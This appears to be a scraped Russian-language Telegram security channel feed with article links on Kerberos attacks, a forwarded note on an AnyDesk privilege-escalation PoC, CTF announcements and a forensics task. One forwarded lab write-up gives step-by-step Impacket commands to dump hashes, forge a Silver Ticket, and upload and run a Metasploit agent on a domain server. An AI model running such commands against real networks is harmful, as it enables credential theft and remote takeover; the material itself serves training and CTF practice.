Атака Kerberoasting позволяет злоумышленнику захватить сервисную УЗ путём запроса TGS с указанием имени этой сервисной УЗ и последующим брутфорсом билета.
А можно ли как-то провести атаку, не имея в арсенале доступ ни к одной доменной УЗ? Обязательно выясним
Читать: https://habr.com/ru/articles/875694/
P.S. Все статьи, которые будут выходить на Хабре, добавляются в Git. Не забывайте про него😉
Please open Telegram to view this post
VIEW IN TELEGRAM
Не ждали? А я сделал!
А если серьезно, то порешаем практические задания для блюшников с платформы Standoff. Разбор заданий для ивента УК Сити (2022).
Я постарался максимально отразить своё мышление при расследованиях, показать какие-то фишечки и просто сделать обзор на PT SIEM и к нему прилегающее.
Надеюсь, вам понравится такой формат
Читать: https://habr.com/ru/articles/877404/
Также в Git добавил новую папку с райтапами. Пользуйтесь
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Следствие ведут Эникейщики: артефакты, экспертиза и пицца в 3 ночи
Привет! Сегодня разберем практические задания для блюшников с платформы Standoff. Разбор заданий будет для ивента УК Сити (2022). Подробнее Легенда Основная деятельность УК City в Государстве F...
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Всем привет!
Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)
Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.
Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.
Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.
Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.
Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.
Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.
Демо можно посмотреть здесь
Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)
Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.
Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.
Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.
Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.
Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.
Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.
Демо можно посмотреть здесь
Видели уже???
https://www.securitylab.ru/news/556556.php
После regreSSHion пошел какой-то тренд на вулны с SSH🔫
https://www.securitylab.ru/news/556556.php
После regreSSHion пошел какой-то тренд на вулны с SSH
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Критический баг в OpenSSH позволяет перехватывать SSH-сессии
Ваши SSH-сессии могут быть перехвачены, если немедленно не принять меры.
Forwarded from FEFU CTF💻
Команда EXE.1sior – 🥇 место на киберучениях, прошедших в рамках уральского форума «Кибербезопасность в финансах»!
В течение нескольких часов ребята, образовавшие своего рода Purple Team, расследовали инциденты информационной безопасности в виртуальном городе Неонополис.
Им предстояло разобраться с самыми разными недопустимыми событиями — от изменения цен на билеты в кинотеатре до сложной многоэтапной атаки на банкомат с проведением несанкционированного перевода.
Поздравляем с заслуженной победой!🎉
В течение нескольких часов ребята, образовавшие своего рода Purple Team, расследовали инциденты информационной безопасности в виртуальном городе Неонополис.
Им предстояло разобраться с самыми разными недопустимыми событиями — от изменения цен на билеты в кинотеатре до сложной многоэтапной атаки на банкомат с проведением несанкционированного перевода.
Поздравляем с заслуженной победой!
Please open Telegram to view this post
VIEW IN TELEGRAM
Silver Ticket — не просто атака, а теневая операция в сердце Active Directory.
Читать: https://habr.com/ru/articles/886584/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RDG CTF (Ilya)
Соревнования пройдут в двух зачетах: студенческом и школьном.
Призёры среди школьников смогут получить дополнительные баллы при поступлении в ДВФУ на направления «Информационная безопасность» и «Компьютерная безопасность»
Если вы не являетесь студентом, представляете разные вузы или обучаетесь в вузе за пределами Дальнего Востока, вы можете принять участие онлайн вне зачета.
👥 Состав команды: до 7 человек. Количество команд не ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы
NetLogon
, LanManServer
и LanManWorkstation
и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (
nmap -p 445 -sT -Pn <serverIP>
), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.Имеем 2 проблемы:
1) Не работают службы
NetLogon
, LanManServer
и LanManWorkstation
, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.
Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.
Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'
...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта
impacket-lookupsid
из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720
После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения
KRB5CCNAME
:proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache
Шаг 2. ATExec Pro
После этого уже при помощи известного нам
atexec-pro.py
и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF): proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30
Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи
impacket-lookupsid
;2) Создание Silvet Ticket при помощи
impacket-ticketer
для привилегированного доступа к целевому хосту;3) Получение доступа к целевому хосту при помощи
atexec-pro.py
с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
артрончик на пути к мировому господству😂
По cyberdefenders райтапы интересно будет вам читать? хотим?
По cyberdefenders райтапы интересно будет вам читать? хотим?
Please open Telegram to view this post
VIEW IN TELEGRAM
Вы уже разобрали Silver и Golden Ticket? Это лишь прелюдия.
Diamond & Sapphire — последние «сокровища» в цепочке уязвимостей с билетами.
В статье рассмотрим:
Читать: https://habr.com/ru/articles/891620/
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Райтапы по CTF{2025}
task.pcapng
18.1 KB
#forensics
А вот это очень интересная задача!
🦈 Спрей и Слёзы Wireshark’а
Дружище, у нас взлом! Похоже, криминал, по коням! 🚨 - часть 2
В очередной раз в галере "Ж" взломали какого-то "сына маминой подруги"
Тебе как самому единственному работяге в нашей конторе необходимо выяснить:
- Учетную запись над которой надругались хацкеры
- Какой глупенький пароль был у УЗ
- Какой вид атаки по (MITRE ATT&CK®) гопники из Мордора отжали креды у нашего хоббита
Флаг в формате: artrone{login%password%T1234.567}
Автор: @artrone
Сложность: “Почему я это делаю и куда делся мой отпуск?”
А вот это очень интересная задача!
🦈 Спрей и Слёзы Wireshark’а
Дружище, у нас взлом! Похоже, криминал, по коням! 🚨 - часть 2
В очередной раз в галере "Ж" взломали какого-то "сына маминой подруги"
Тебе как самому единственному работяге в нашей конторе необходимо выяснить:
- Учетную запись над которой надругались хацкеры
- Какой глупенький пароль был у УЗ
- Какой вид атаки по (MITRE ATT&CK®) гопники из Мордора отжали креды у нашего хоббита
Флаг в формате: artrone{login%password%T1234.567}
Автор: @artrone
Сложность: “Почему я это делаю и куда делся мой отпуск?”
Forwarded from Райтапы по CTF{2025}
Хочу поддержать крутых ребят, которые качают скиллы в ИБ, делятся знаниями и двигают сообщество вперед. Пусть их каналы найдут своих подписчиков, а авторы видят, что их труд действительно ценят.
Как и обещал — ловите список каналов, которые стоит заценить!
✅ @Thinkingoy
Помогает новичкам в CTF — разбирает задачки, пишет гайды. Ждем продолжения!
✅ @duckerz
Канал команды DUCKERZ. Ребята реально делают CTF доступным и интересным для всех. Они не только публикуют полезные материалы для новичков в ИБ, но и сами подняли крутую CTF-платформу. Если у тебя проблемы с форматом флага, платформа глючит или просто нужна подсказка, в их чате тебе помогут по-человечески, а не отмахнутся шаблонными ответами.
✅ @wh_lab
Обзор тулов для red team, разборы CVE и PoC (в основном внутрянка), CTF, стендоффы — все по делу.
✅ @k3vg3n_ch
CTF, Bug Bounty и просто зарисовки из жизни кибератлета.
✅ @s3c4rch
Авторские исследования, наработки, а скоро еще и материалы по куберам, докерам и облакам.
✅ @hackerblog
Личный блог с крутыми статьями и исследованиями через призму purple team.
✅ @hun7_0r_b3_hun73d
Обучалки по ИБ, инфобез-лайф, холиварные новости, а в планах — собственные исследования и CVE.
✅ @pentestnotes
Полезные фишки для пентеста.
✅ @RusNetInt
Все, что вы хотели знать про OSINT — от базовых вещей до неочевидных тонкостей.
Как и обещал — ловите список каналов, которые стоит заценить!
✅ @Thinkingoy
Помогает новичкам в CTF — разбирает задачки, пишет гайды. Ждем продолжения!
✅ @duckerz
Канал команды DUCKERZ. Ребята реально делают CTF доступным и интересным для всех. Они не только публикуют полезные материалы для новичков в ИБ, но и сами подняли крутую CTF-платформу. Если у тебя проблемы с форматом флага, платформа глючит или просто нужна подсказка, в их чате тебе помогут по-человечески, а не отмахнутся шаблонными ответами.
✅ @wh_lab
Обзор тулов для red team, разборы CVE и PoC (в основном внутрянка), CTF, стендоффы — все по делу.
✅ @k3vg3n_ch
CTF, Bug Bounty и просто зарисовки из жизни кибератлета.
✅ @s3c4rch
Авторские исследования, наработки, а скоро еще и материалы по куберам, докерам и облакам.
✅ @hackerblog
Личный блог с крутыми статьями и исследованиями через призму purple team.
✅ @hun7_0r_b3_hun73d
Обучалки по ИБ, инфобез-лайф, холиварные новости, а в планах — собственные исследования и CVE.
✅ @pentestnotes
Полезные фишки для пентеста.
✅ @RusNetInt
Все, что вы хотели знать про OSINT — от базовых вещей до неочевидных тонкостей.